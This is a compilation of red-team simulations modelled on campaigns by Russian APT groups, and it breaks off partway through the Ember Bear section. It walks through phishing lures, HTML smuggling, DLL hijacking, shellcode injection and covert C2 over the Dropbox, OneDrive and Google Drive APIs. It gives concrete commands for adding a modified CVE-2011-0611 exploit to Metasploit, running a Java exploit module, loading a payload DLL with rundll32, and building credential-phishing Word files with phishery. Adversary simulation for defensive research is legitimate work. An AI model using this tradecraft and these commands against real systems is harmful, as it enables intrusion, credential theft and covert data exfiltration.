Russian APT groups Adversary Simulation

This PDF is a compilation of all Russian APT simulations that target many vital sectors,both
private and governmental. The simulation includes written tools, C2 servers, backdoors,
exploitation techniques, stagers, bootloaders, and many other tools that attackers might have
used in actual attacks. These tools and TTPs (Tactics, Techniques, and Procedures)
are simulated here.
These are all the names of the Russian APT groups, and I simulated one attack for each group.

1. Cozy Bear APT29: https://github.com/S3N4T0R-0X0/APT29-Adversary-Simulation.git

2. Fancy Bear APT28: https://github.com/S3N4T0R-0X0/APT28-Adversary-Simulation.git

3. Energetic Bear: https://github.com/S3N4T0R-0X0/Energetic-Bear-APT.git

4. Berserk Bear: https://github.com/S3N4T0R-0X0/Berserk-Bear-APT.git

5. Gossamer Bear: https://github.com/S3N4T0R-0X0/Gossamer-Bear-APT.git

6. Voodoo Bear APT44: https://github.com/S3N4T0R-0X0/Voodoo-Bear-APT.git

7. Ember Bear: https://github.com/S3N4T0R-0X0/Ember-Bear-APT.git

8. Venomous Bear: https://github.com/S3N4T0R-0X0/Venomous-Bear-APT.git

9. Primitive Bear: https://github.com/S3N4T0R-0X0/Primitive-Bear-APT.git

Table of Contents

Russian cyber superriority .............................................................................................3

Cozy Bear APT29 .............................................................................................................4

Energetic Bear................................................................................................................12

Berserk Bear ...................................................................................................................20

Fancy Bear APT28 ..........................................................................................................23

Gossamer Bear ...............................................................................................................31

Venomous Bear ..............................................................................................................37

Ember Bear .....................................................................................................................42

Primitive Bear .................................................................................................................50

Voodoo Bear APT44 .......................................................................................................55

 Exploiting resources is much more important than just using them ⚡

This is what many Russian threat actors rely on. They exploit incidents in general for phishing
campaigns, such as the earthquake that happened in Turkey. At that time, all countries of the world
were sending aid to Turkey, and they took advantage of this issue for the sake of launching phishing
campaigns on Diplomatic institutions in Turkey, and on the same issue, took advantage of the war that
Russia was waging against Ukraine at the time. All the people in Ukraine were selling their homes,
property, and valuable things at very cheap prices for the sake of being able to travel and save their
lives, and the same issue is repeated every time in a different way, even at the technical level, that they
are using APIs to hide traffic.

https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

Of course, this is in addition to their discovery of zero-day vulnerabilities and using them in the attack,
knowing the type of defense machines before the attack and writing down the servers specifically for
this attack. At the same time, the threat actors create software vulnerabilities that are intended to
access sensitive information and at the same time, they also build the C2 server Based on certain
information that the victim has, such as a specific type of product, threat actors attempt to build a
c2 server that exploits API of the same type of product that is already present at the target to avoid the
SOC team by hiding the traffic by product API.

https://thehackernews.com/2024/03/apis-drive-majority-of-internet-traffic.html?m=1

This is in addition to their exploitation of knowledge of the types of products already available to their
targets to create fake software and exploit it to carry out malicious activities, This is just like what
happened at the beginning of the Russian-Ukrainian war, where threat actors used fack update to attack
Ukraine’s CERT.

https://www.socinvestigation.com/ukraines-cert-warns-russian-threat-actors-for-fake-av-updates/

The Russian APT groups use their capabilities to collect information 100%,
which is the main thing on which their attack is built.
Cozy Bear APT29
This is a simulation of attack by the Cozy Bear group (APT-29) targeting diplomatic missions.
The campaign began with an innocuous and legitimate event. In mid-April 2023, a diplomat within the
Polish Ministry of Foreign Affairs emailed his legitimate flyer to various embassies advertising the sale
of a used BMW 5-series sedan located in Kyiv. The file was titled BMW 5 for sale in Kyiv - 2023.docx.
I relied on palo alto to figure out the details to make this simulation: https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

1. DOCX file: created DOCX file includes a Hyperlink that leads to downloading further HTML
(HTML smuggling file).

2. HTML Smuggling: The attackcers use the of HTML smuggling to obscure the ISO file.

3. LNK files: When the LNK files (shortcut) are executed they run a legitimate EXE and open a PNG file.
However, behind the scenes, encrypted shellcode is read into memory and decrypted.

4. ISO file: The ISO file contains a number of LNK files that are masquerading as images.
These LNK files are used to execute the malicious payload.

5.DLL hijacking: The EXE file loads a malicious DLL via DLL hijacking, which allows the attacker to
execute arbitrary code in the context of the infected process.

6.Shellcode injection: The decrypted shellcode is then injected into a running Windows process,
giving the attacker the ability to execute code with the privileges of the infected process.

7.Payload execution: The shellcode decrypts and loads the final payload inside the current process.

8.Dropbox C2: This payload beacons to Dropbox and Primary/Secondary C2s based on the Microsoft
Graph API.
The first stage (delivery technique)

First the attackers created DOCX file includes a Hyperlink that leads to downloading further HTML
(HTML smuggling file) The advantage of the hyperlink is that it does not appear in texts, and this is
exactly what the attackers wanted to exploit.
HTML Smuggling used to obscure ISO file and the ISO contains a number of LNK files masquerading
as images command line to make payload base64 to then put it in the HTML smuggling file: base64
payload.iso -w 0 and i added a picture of the BMW car along with the text content of the phishing
message in the HTML file.

The Second stage (implanting technique)

I now need to create a PNG image that contains images of the BMW car, but in the background
when the image is opened, the malware is running in the background, at this stage i used the
WinRAR program to make the image open with Command Line execution via CMD when opening
the image and I used an image in icon format.
 After using WinRaR for this compressed file, i will make a short cut of this file and put it in
another file with the actual images then we will convert it to an ISO file through the PowerISO
program.

Note: This iso file is the one to which i will make base64 for this iso file and put in the html
smuggling file before make hyperlink and place it in the docx file.

The third stage (execution technique)

Because i put the command line in the setup (run after extraction) menu in the Advanced SFX options
for the WinRaR program now when the victim open the ISO file to see the high-quality images for the
BMW car according to the phishing message he had previously received he will execute the payload
with opening the actual image of the BMW car.
The fourth stage (Data Exfiltration) over Dropbox API C2 Channe
The attackers used the Dropbox C2 (Command and Control) API as a means to establish a
communication channel between their payload and the attacker's server. By using Dropbox
as a C2 server, attackers can hide their malicious activities among the legitimate traffic to Dropbox,
making it harder for security teams to detect the threat. First, i need to create a Dropbox account
and activate its permissions, as shown in the following figure.

After that, I will go to the settings menu to generate the access token for the Dropbox account,
and this is what I will use in Dropbox C2.
 This script integrates Dropbox API functionality to facilitate communication between the
compromised system and the attacker-controlled server, thereby hiding the traffic within legitimate
Dropbox communication, and take the access token as input prompts the user to enter an
AES key (which must be 16, 24, or 32 bytes long) and encrypts the token using AES encryption
in ECB mode. It then base64 encodes the encrypted token and returns it.

I used payload written by Python only to test C2 (testing payload.py), if there were any problems
with the connection (just for test connection) before writing the actual payload.

The fifth stage (payload with DLL hijacking) and injected Shellcode
This payload uses the Dropbox API to upload data, including command output to Dropbox.
By leveraging the Dropbox API and providing an access token the payload hides its traffic within
the legitimate traffic of the Dropbox servic and If the malicious DLL fails to load, it prints a warning
message but continues executing without it.
1.DLL Injection: The payload utilizes DLL hijacking to load a malicious DLL into the address
space of a target process.

2.Shellcode Execution: Upon successful injection, the malicious DLL executes shellcode stored
within its DllMain function.

3.Memory Allocation: The VirtualAlloc function is employed to allocate memory within the target
process, where the shellcode will be injected.

4.Shellcode Injection: The shellcode is copied into the allocated memory region using memcpy,
effectively injecting it into the process

5.Privilege Escalation: If the compromised process runs with elevated privileges, the injected shellcode
inherits those privileges, allowing the attacker to perform privileged operations.
Final result: payload connect to Dropbox C2 server

the final step in this process involves the execution of the final payload. After being decrypted
and loaded into the current process, the final payload is designed to beacon out to both Dropbox
API-based C2 server.
Energetic Bear
This is a simulation of attack by (Energetic Bear) APT group targeting “eWon” is a Belgian producer
of SCADA and industrial network equipmen, the attack campaign was active from January 2014,
The attack chain starts with malicious XDP file containing the PDF/SWF exploit (CVE-2011-0611)
and was used in spear-phishing attack. This exploit drops the loader DLL which is stored in an
encrypted form in the XDP file, The exploit is delivered as an XDP (XML Data Package) file which
is actually a PDF file packaged within an XML container. I relied on Kaspersky tofigure out the details
to make this simulation: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080817/EB-YetiJuly2014-Public.pdf

This attack included several stages including exploitation of the (CVE-2011-0611) vulnerability
which allows attackers to overwrite a pointer in memory by embedding a specially crafted .swf,
The XDP file contains a SWF exploit CVE-2011-0611 and two files encrypted with XOR stored in the
XDP file One of the files is malicious DLL the other is a JAR file which is used to copy and run the
DLL by executing the Cmd command line

1. CVE-2011-0611: this module exploits a memory corruption vulnerability in Adobe Flash Player
versions 10.2.153.1 and earlier, i maked Modified version of the exploit based on Windows 10.

2. CVE-2012-1723: this exploit allows for sandbox escape and remote code execution on any target
with a vulnerable JRE (Java IE 8).

3. XDP file: this XDP file contains a malicious XML Data Package (XDP) with a SWF exploit
(CVE-2011-0611), It also includes functionality to download additional files via HTML-Smuggling
by apache host.

4. HTML Smuggling: the html-smuggling file is used after uploading it to the apache server to
download other files, One of the files is DLL payload the other is a small JAR file.

5. JAR file: this jar file used to copy and run the DLL by executing the cmd command.

6. DLL payload: the attackers used havex trojan, havex scanned the infected system to locate any
supervisory control and data acquisition SCADA.

7. Encrypted with XOR: the XDP file contains a SWF exploit and two files encrypted with XOR.

8. PHP backend C2-Server: the attckers used hacked websites as simple PHP C2 Server backend.

9.Final result: make remote communication by utilizes XOR encryption for secure data transmission
between the attacker server and the target.
The first stage (exploit Adobe SWF Memory Corruption Vulnerability CVE-2011-0611)

This module exploits a memory corruption vulnerability (CVE-2011-0611) in Adobe Flash Player versions
10.2.153.1 and earlier. The vulnerability allows for arbitrary code execution by exploiting a flaw in how
Adobe Flash Player handles certain crafted .swf files. By leveraging this vulnerability, an attacker can
execute arbitrary code on the victim's system.

sudo cp EnergeticBear_exploit.rb /usr/share/metasploit-framework/modules/exploits

sudo updatedb

msf6 > search EnergeticBear_exploit

 This Modified version of the exploit CVE-2011-0611 based on Windows 10 ,the original exploit from :
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

The Second stage (CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE)

This vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update
4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote
attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
if you need know more about CVE-2012-1723:
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Java/CVE-2012-1723!generic&threatId=-2147302241

use exploit/multi/browser/java_verifier_field_access

The attackers actively compromises legitimate websites for watering hole attacks. These hacked
websites in turn redirect victims to malicious JAR or HTML files hosted on other sites maintained
by the group (exploiting CVE-2013-2465, CVE-2013-1347, and CVE-2012-1723 in Java 6, Java 7, IE 7
and IE 8), These hacked websites will be using a simple PHP C2 Server backend.
 The third stage (XML Data Package XDP with a SWF exploit)
The exploit is delivered as an XDP (XML Data Package) file which is actually a PDF file packaged
within an XML container. This is a known the PDF obfuscation method and serves as an additional
anti-detection layer. if you need know more about XDP file: https://filext.com/file-extension/XDP

The XDP file contains a SWF exploit (CVE-2011-0611) and two files (encrypted with XOR) stored in the
PDF file, It also includes functionality to download additional files via HTML-Smuggling by apache host.

The fourth stage (HTML-Smuggling with DLL payload & JAR file)

The HTML smuggling file is used after uploading it to the apache server to download other files, One
of the files is DLL payload the other is a small JAR file which is used to copy and run the DLL,
the command line to make payload base64 to then put it in the HTML smuggling file: base64
payload.dll -w 0 and the same command but with jar file.
The fifth stage (Copy DLL by JAR file)
This jar file used to copy and run the DLL by executing the following command: cmd /c copy
payload.dll %TEMP%\\payload.dll /y & rundll32.exe %TEMP%\\payload.dll,RunDllEntry

It constructs a command to copy a file named payload.dll to the %TEMP% directory

(typically the temporary directory) as payload.dll and then execute it using rundll32.exe and it waits
for the process to finish using process.waitFor().

The sixth stage DLL payload (Havex trojan)

The attackers gained access to eWon’s FTP site and replaced the legitimate file with one that is bound
with the Havex dropper several times.

The main functionality of this component is to download and load additional DLL modules into the
memory. These are stored on compromised websites that act as C&C servers. In order to do that,
the malware injects itself into the EXPLORER.EXE process, sends a GET/POST request to the PHP
script on the compromised website, then reads the HTML document returned by the script, looking
for a base64 encrypted data between the two “havex” strings in the comment tag <!--havexhavex-->
and writes this data to a %TEMP%<tmp>.xmd file (the filename is generated by GetTempFilename
function).
Full Disclosure of Havex Trojans: https://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans
If you need know more about Havex trojan: https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat

Notes on havex trojan: http://pastebin.com/qCdMwtZ6

In this simulation i used a simple payload with XOR encryption to secure the connection between the
C2 Server and the Target Machine, this payload uses Winsock for establishing a tcp connection
between the target machine and the attacker machine, in an infinite loop the payload receives
commands from the attacker c2 decrypts them using (XOR) encryption executes them using system
and then sleeps for 10 seconds before repeating the loop.

This network forensics form (SCADA hacker) about havex trojan:

https://scadahacker.com/library/Documents/Cyber_Events/NETRESEC%20-%20SCADA%20Network%20Forensics.pdf

The seventh stage (encrypted XDP with XOR)

After making compile for the payload and jar file and make base64 for the jar file and DLL payload,
i put them in the html smuggling file, then i make host for the html file, then i put this host in the
XDP file next to CVE-2011-0611, then i make XOR encryption for XDP file, after this convert xdp to pdf.

i used browserling to make xor encrypt:https://www.browserling.com/tools/xor-encrypt

The eighth stage (PHP backend C2-Server)
This PHP C2 server script enable to make remote communication by utilizes XOR encryption for secure
data transmission between the attacker server and the target.

xor_encrypt($data, $key) This function takes two parameters: the data to be encrypted ($data) and
the encryption key ($key) it iterates over each character in the data and performs an XOR operation
between the character and the corresponding character in the key (using modulo to repeat the key
if it's shorter than the data), the result is concatenated to form the encrypted output which is returned.

send_to_payload($socket, $data, $encryption_key) This function sends encrypted data to the target
system (payload) over a socket connection it first encrypts the data using the xor_encrypt function
with the provided encryption key then it writes the encrypted data to the socket using socket_write.

receive_from_payload($socket, $buffer_size, $encryption_key) This function receives encrypted data

from the target system over a socket connection it reads data from the socket with a maximum buffer
size specified by $buffer_size, the received encrypted data is then decrypted using the xor_encrypt
function with the provided encryption key before being returned.

if you chose (command or URL) is encrypted using XOR encryption with a user-defined key before
being sent to the target.

This other simulation for the same attack by cobaltstrike: https://www.youtube.com/watch?v=XkBvo6z0Tqo

Final result: payload connect to PHP C2-server

1.Set up a web server or any HTTP server that can serve text content.

2.Upload a text file containing the commands you want the compromised system to execute.

3.Make sure the text file is accessible via HTTP and note down the URL.

4.When prompted by the script, enter the URL you obtained in step.

NOTE: If you choose to fetch commands from a URL it will prompt you to enter the URL,
If you choose to enter commands directly it will prompt you to Enter a command to execute
 Berserk Bear

This is a simulation of attack by (Berserk Bear) APT group targeting critical infrastructure and
energy companies around the world, primarily in Europe and the United States,
The attack campaign was active from least May 2017. This attack target both the critical
infrastructure providers and the vendors those providers use to deliver critical services,
the attack chain starts with malicious (XML container) Injected into DOCX file connected to
external server over (SMB) used to silently harvest users credentials and was used in
spear-phishing attack. I relied on ‫ ‏‬Cisco Talos Intelligence Group‫ ‏‬tofigure out the details to
make this simulation: https://blog.talosintelligence.com/template-injection/

If you need to know more about Berserk Bear APT group attacks:
https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Berserk%20Bear%2C%20Dragonfly%202%2E0&n=1

This attack included several stages including Injecting a DOCX file and using a malicious XML
container that creates a specific alert to obtain credentials and is transferred to the attackers’
server, which in turn is used by them to obtain data for the organizations that were targeted by
the spear-phishing attack. The DOCX file was a CV that was Presented to a person with ten years
of experience in software development and SCADA control systems.

1.Create CV DOCX file which will be injected and sent spear phishing.

2.Make injections into DOCX file to obtain credentials using the phishery tool.

3.Credential Phishing is when the target opens the target Word file and enters credentials into
the notification that will be shown to them.
 The first stage (delivery technique)

Since the attackers here wanted to target institutions related to energy and energy management
systems such as SCADA, the attackers created a DOCX file in the form of a CV to apply for a job.
It seems that there was a hiring open to work for such a position, and the attackers sent the CV
that contained the malicious XML container, here i created a CV identical to the one they used
in the actual attack.

The Second stage (implanting technique)

According to what Cisco Talos Intelligence Group said the attackers worked to inject the DOCX file via
a phishery tool, this is because at the time of this attack it was a tool that had not been released for a
long time and this is the point where the attackers took advantage of it the most and it is also possible
that they made some modifications before using it in this attack.
Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via
Basic Authentication. Phishery also provides the ability easily to inject the URL into a
.docx Word document.

Github repository: https://github.com/ryhanson/phishery.git

sudo apt-get install phishery

phishery -u https://192.168.138.138 -i CV.docx -o malicious.docx

phishery

Now the malicious CV will be sent to the target and wait for the Credentials.

The third stage (execution technique)

Credential Phishing is when the target opens the target Word file and enters
credentials into the notification that will be shown to them.
Fancy Bear APT28
This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking government
officials Western Asia and Eastern Europe the attack campaign was active from October to
November 2021, The attack chain starts with the execution of an Excel downloader sent to the victim
via email which exploits an MSHTML remote code execution vulnerability (CVE-2021-40444) to
execute a malicious executable in memory, I relied on trellix tofigure out the details to make this
simulation: https://www.trellix.com/blogs/research/prime-ministers-office-compromised/

This attack included several stages including exploitation of the CVE-2021-40444 vulnerability
through which remote access execution can be accessed through word file this is done by injecting
the DLL into Word file through this exploit, Also use OneDrive c2 Server to get command and
control and this is to data exfiltration with hide malicious activities among the legitimate traffic
to OneDrive.

1. Create dll downloads files through base64, This is to download two files the first is (dfsvc.dll)
the second is (Stager.dll).

2. Exploiting the zero-day vulnerability to inject the DLL file into Word File and create an execution
for DLL by opening Word File.

3. Word File is running and the actual payload is downloaded through DLLDownloader.dll and I
have two files Stager.dll and dfsvc.dll.

4. The Stager decrypts the actual payload and runs it which in turn is responsible for command
and control.

5. Data exfiltration over OneDrive API C2 Channe, This integrates OneDrive API functionality to
facilitate communication between the compromised system and the attacker-controlled server
thereby potentially hiding the traffic within legitimate OneDrive communication.

6. Get Command and Control through payload uses the OneDrive API to upload data including
command output to OneDrive, the payload calculates the CRC32 checksum of the MachineGuid
and includes it in the communication with the server for identification purposes.
The first stage (delivery technique)
First the attackers created DLL executable (DLLDownloader.dll) this DLL it can download two
payloads by command line to make payload base64 base64 dfsvc.dll -w 0 and base64 Stager.dll
-w 0 the first is (dfsvc.dll) the second is (Stager.dll), This DLL will be used in the next stage by
injecting it into a Word file via the Zero-day vulnerability.
The Second stage (implanting technique)

second the attackers exploited the Zero-day vulnerability (CVE-2021-40444)

https://github.com/lockedbyte/CVE-2021-40444/ this vulnerability works by injecting a DLL file into
Microsoft Word When the file is opened it executes the DLL payload, which is responsible for
downloading two other payload (dfsvc.dll) and (Stager.dll).

When a victim opens the malicious Office document using Microsoft Office, the application parses
the document's content, including the embedded objects. The flaw in the MSHTML component is
triggered during this parsing process, allowing the attacker's malicious code to be executed within
the context of the Office application.
The third stage (execution technique)
Now i have a Word file when i open it performs an execution for the DLL Downloader and thus
downloads the two files (dfsvc.dll) and (Stager.dll) this is through the vulnerability CVE-2021-40444.

After that the stager decrypts the payload using the Decrypt-Payload function
(you need to implement the decryption algorithm) and then executes the payload using the
Execute-Payload function, In this simulation i made the build perform an execution directly
without the need for the stager script, and it can be modified to suit the stager making an
execution for the actual payload.
The fourth stage (Data Exfiltration) over OneDrive API C2 Channe

The attackers used the OneDrive C2 (Command and Control) API as a means to establish a
communication channel between their payload and the attacker's server, By using OneDrive as a
C2 server, attackers can hide their malicious activities among the legitimate traffic to OneDrive,
making it harder for security teams to detect the threat. First, I need to create a Microsoft Azure
account and activate its permissions, as shown in the following figure.

I will use the Application (client) ID for the inputs needed by the C2 server

After that, I will go to the Certificates & secrets menu to generate the Secret ID for the Microsoft
Azure account, and this is what i will use in OneDrive C2.
To make simulation of this attack at the present time i did not use the PowerShell Empire to avoid
detection and i make customization of the OneDrive C2 server, This script integrates OneDrive
API functionality to facilitate communication between the compromised system and the attacker
controlled server, thereby potentially hiding the traffic within legitimate OneDrive communication
and i used AES Encryption to secure the connection just like the PowerShell Empire server that
the attackers used in the actual attack, The customization OneDrive C2 Server inspired by
PowerShell Empire.

The fifth stage (payload with OneDrive API requests)

This payload establishes covert communication via socket to a remote server, disguising traffic
within OneDrive API requests. It identifies machines using CRC32 checksums of their MachineGuids.
Commands are executed locally, with outputs sent back to the server or uploaded to OneDrive.
Its dynamic configuration enables flexible and stealthy remote control and data exfiltration.
1.Covert communication: The payload initiates a socket connection to a specified IP address and port.

2.Identification mechanism: It retrieves the MachineGuid from the Windows registry and calculates
its CRC32 checksum.

3.Command execution: The payload enters a loop to receive commands from the remote server
or OneDrive.

4.Data exfiltration: After execution it captures output and sends it back to the server or uploads it to
OneDrive.

5.Stealthy communication: Utilizing OneDrive API it blends network traffic with legitimate OneDrive
traffic.

6.Dynamic configuration: Behavior is configured by specifying IP address, port and optionally an

access token for OneDrive.
Final result: payload connect to OneDrive C2 server
the final step in this process involves the execution of the final payload. After being decrypted
and loaded into the current process, the final payload is designed to beacon out to both
OneDrive API-based C2 server.
Gossamer Bear
This is a simulation of attack by (Gossamer Bear) APT group targeting Institutions logistics
support and defense to Ukraine the attack campaign was active from April 2023, The attack chain
starts with send message with either an attached PDF file or a link to a PDF file hosted on a cloud
storage platform. The PDF file will be unreadable, with a prominent button purporting to enable
reading the content, Pressing the button in a PDF lure causes the default browser to open a link
embedded in the PDF file code this is the beginning of the redirection chain. Targets will likely see
a web page titled “Docs” in the initial page opened and may be presented with a CAPTCHA to
solve before continuing the redirection. The browsing session will end showing a sign-in screen
to the account where the spear-phishing email was received, with the targeted email already
appearing in the username field. I relied on microsoft tofigure out the details to make this simulation:
https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/

This attack included several stages including creating a PDF file and placing a hyperlink inside it.
The PDF file will be unreadable, with a prominent button intended to enable reading the content,
Pressing the button in the PDF file causes the default browser to open a link to a fake page that
steals the target's Credential, From the same PDF I also made it possible for me to get Command and
Control.

1. PDF file: created PDF file includes a Hyperlink that leads to a fake page that steals Credential.

2. HTML Smuggling: it was used to open the URL of the credentials phishing page and also to install
the payload.

3. Now when you click the prominent button in the PDF file it launches the html smuggling file on
the apache server which contains payload in base64 encod and the phishing link.

4. Data exfiltration: over GoogleDrive API C2 Channe, This integrates GoogleDrive API functionality
to facilitate communication between the compromised system and the attacker-controlled server thereb

5. Make simple reverse shell payload to creates a TCP connection to a command and control (C2)
server and listens for commands to execute on the target machine.

6. The final step in this process involves the execution of the final payload, After it was downloaded
through an obfuscated HTML file with base64 encoding and a phishing link was opened.
 The first stage (delivery technique)
First the attackers created PDF file includes a Hyperlink that leads to a fake page that steals
Credential, The advantage of the hyperlink is that it does not appear in texts, and this is exactly what
the attackers wanted to exploit.

HTML Smuggling it was used to open the URL of the credentials phishing page and also to create
an install for payload to get Command and Control, After that i will place the HTML file in the apache
server, take the localhost and place it as a hyperlink in the prominent button in the PDF file.
HTML Smuggling it was used to open the URL of the credentials phishing page and also to create
an install for payload to get Command and Control, After that i will place the HTML file in the apache
server, take the localhost and place it as a hyperlink in the prominent button in the PDF file.

The second stage (implanting technique)

Now i will place the phishing link inside the HTML file in addition to the payload through
base64 inside the HTML file, In this simulation i used the PyPhisher tool.

PyPhisher: https://github.com/KasRoudra2/PyPhisher.git

base64 payload.exe
After that i will obfuscate the html file after putting the phishing link and the payload inside it before
putting it in the apache server

I used wmtips to make obfuscation for the html file: https://www.wmtips.com/tools/html-obfuscator/#google_vignette

The third stage (execution technique)

Now when i click the prominent button in the PDF file it launches the html smuggling file on the
apache server which contains payload in base64 encod and the phishing link.
The fourth stage (Data Exfiltration) over GoogleDrive API C2 Channe

In the actual attack, the attackers did not use an actual c2 server or payload and limited themselves
to spear phishing, but here I wanted to exploit the presence of a larger HTML file to download the
payload and open malicious url.

First i need to create a google Drive account, as shown in the following figure

1. Log into the Google Cloud Platform

2. Create a project in Google Cloud Platform dashboard

3. Enable Google Drive API

4. Create a Google Drive API key

I used the GoogleDrive C2 (Command and Control) API as a means to establish a communication
channel between the payload and the attacker's server, By using GoogleDrive as a C2 server,
i can hide the malicious activities among the legitimate traffic to GoogleDrive, making it harder for
security teams to detect the threat.
The fifth stage (payload with reverse shell)
This payload is a simple reverse shell written in Rust it creates a TCP connection to a command
and control (C2) server and listens for commands to execute on the infected machine, the payload
first sets up the IP address and port number of the C2 server.

When a command is received, it is executed using the cmd command in Windows. The output of
the command is captured and sent back to the C2 server, the loop continues until the connection
is closed by the C2 server or an error occurs while receiving data from the server.

Final result: payload connect to GoogleDrive C2 server

The final step in this process involves the execution of the final payload, After it was
downloaded through an obfuscated HTML file with base64 encoding and a phishing
link was opened.
 Venomous Bear
This is a simulation of attack by (Venomous Bear) APT group targeting U.S.A, Germany and
Afghanista attack campaign was active since at least 2020, The attack chain starts with installed the
backdoor as a service on the infected machine. They attempted to operate under the radar by naming
the service "Windows Time Service", like the existing Windows service. The backdoor can upload
and execute files or exfiltrate files from the infected system, and the backdoor contacted the
command and control (C2) server via an HTTPS encrypted channel every five seconds to check if
there were new commands from the operator. I relied on ‫ ‏‬Cisco Talos Intelligence Group‫ ‏‬tofigure out
the details to make this simulation: https://blog.talosintelligence.com/tinyturla/

The attackers uses a .BAT file that resembles the Microsoft Windows Time Service, to install the
backdoor. The backdoor comes in the form of a service dynamic link library (DLL) called w64time.dll.
The description and filename make it look like a valid Microsoft DLL. Once up and running, it allows
the attackers to exfiltrate files or upload and execute them, thus functioning as a second-stage postern
when needed.

1. BAT file: The attackers used a .bat file similar to the one below to install the backdoor as a harmless
-looking fake Microsoft Windows Time service.

2. DLL backdoor: I have developed a simulation of the backdoor that the attackers used in the actual
attack.

3. Backdoor Listener: I was here developed a simple listener script that waits for the incoming
connection from the backdoor when it is executed on the target machine.

According to what the Cisco team said, they were not able to identify the method by which this
backdoor was installed on the victims’ systems.
The first stage (.BAT file)
The attackers used a .bat file similar to the one below to install the backdoor as a harmless-looking
fake Microsoft Windows Time service, the .bat file is also setting the configuration parameters in
the registry the backdoor is using.

I wrote a .bat file identical to the one the attackers used to the one below to install the backdoor
as a fake Microsoft Windows Time service.

These commands add various configuration parameters for the W64Time service to the registry.

ServiceDll: Specifies the DLL that implements the service.

Hosts: Sets the hosts and port (values removed for security).

Security: Configures security settings (value removed for security).

TimeLong: A time-related setting.

TimeShort: Another time-related setting.

This means the malware is running as a service, hidden in the svchost.exe process. The DLL's
ServiceMain startup function is doing not much more than executing.

The Second stage (DLL backdoor)

"Here, I have developed a simulation of the backdoor that the attackers used in the actual attack."

First, the backdoor reads its configuration from the registry and saves it in the "result" structure,
which is later on assigned to the "sConfig" structure.
This backdoor includes the following components:

1.Service Control Handler: Registers a service control handler to manage the service's state.

2.Main Malware Function: Placeholder for the main logic of the backdoor.

3.Configuration Reading: Initializes the configuration with placeholders for actual values.

4.C2 Command Retrieval: Simulates retrieving commands from a Command and Control (C2) server.

5.Command Processing: Processes the retrieved commands (currently simulated).

6.Service Loop: Continuously connects to the C2 server and processes commands, with error
handling and cleanup.

Adjust the placeholder values and add the actual logic for backdoor operations and C2 command
processing as per your requirements.
The third stage (Backdoor Listener)

I was here developed a simple listener script that waits for the incoming connection from the
backdoor when it is executed on the target machine.

Accepts incoming connections: When a client connects, it prints the client's IP address and port.

Sends the command: Encodes the command as bytes and sends it over the socket.

Prompts for a command: Asks the user to enter a command to send to the connected client.

Continues reading until no more data is received.

Receives output from the client: Reads data in chunks of 4096 bytes.

Accumulates the data into the output variable.

 Ember Bear

This is a simulation of attack by (Ember Bear) APT group targeting energy Organizations in Ukraine
the attack campaign was active on April 2021, The attack chain starts wit spear phishing email sent
to an employee of the organization, which used a social engineering theme that suggested the
individual had committed a crime. The email had a Word document attached that contained a
malicious JavaScript file that would download and install a payload known as SaintBot
(a downloader) and OutSteel (a document stealer). The OutSteel tool is a simple document stealer.
It searches for potentially sensitive documents based on their file type and uploads the files to a
remote server. The use of OutSteel may suggest that this threat group’s primary goals involve data
collection on government organizations and companies involved with critical infrastructure.
The SaintBot tool is a downloader that allows the threat actors to download and run additional tools
on the infected system. SaintBot provides the actors persistent access to the system while granting
the ability to further their capabilities. I relied on palo alto to figure out the details to make this
simulation: https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

This attack included several stages including links to Zip archives that contain malicious shortcuts
(LNK) within the spear phishing emails, as well as attachments in the form of PDF documents,
Word documents, JavaScript files and Control Panel File (CPL) executables. Even the Word
documents attached to emails have used a variety of techniques, including malicious macros,
embedded JavaScript and the exploitation of CVE-2017-11882 to install payloads onto the system.
With the exception of the CPL executables, most of the delivery mechanisms rely on PowerShell
scripts to download and execute code from remote servers.

1. Create the Word Document: Write a Word document (.docx) containing the exploitation of
CVE-2017-11882 to install payloads onto the system.

2. CVE-2017-11882: this exploit allow an attacker to run arbitrary code in the context of the current
user by failing to properly handle objects in memory.

3. Data exfiltration: over Discord API C2 Channe, This integrates Discord API functionality to facilitate
communication between the compromised system and the attacker-controlled server thereby
potentially hiding the traffic within legitimate Discord communication.

4. SaintBot: is a payload loader, It contains capabilities to download further payloads as requested

by attackers.

5. The attackers used .BAT file to disable Windows Defender functionality, It accomplishes this by
executing multiple commands via CMD that modify registry keys and disabling Windows Defender
scheduled tasks.

6. OutSteel: is a file uploader and document stealer developed with the scripting language.
 Some examples of the PDF and docx files that was used in this attack.

The first stage (delivery technique)

In the beginning, I will create a Word file that I will use to injections for a vulnerability that
attackers used in the actual attack to install payloads on the system.

April 2021: Bitcoin-themed spear phishing emails targeting Ukrainian government organizations.
 The second stage (exploit Microsoft Office Memory Corruption Vulnerability
CVE-2017-11882)

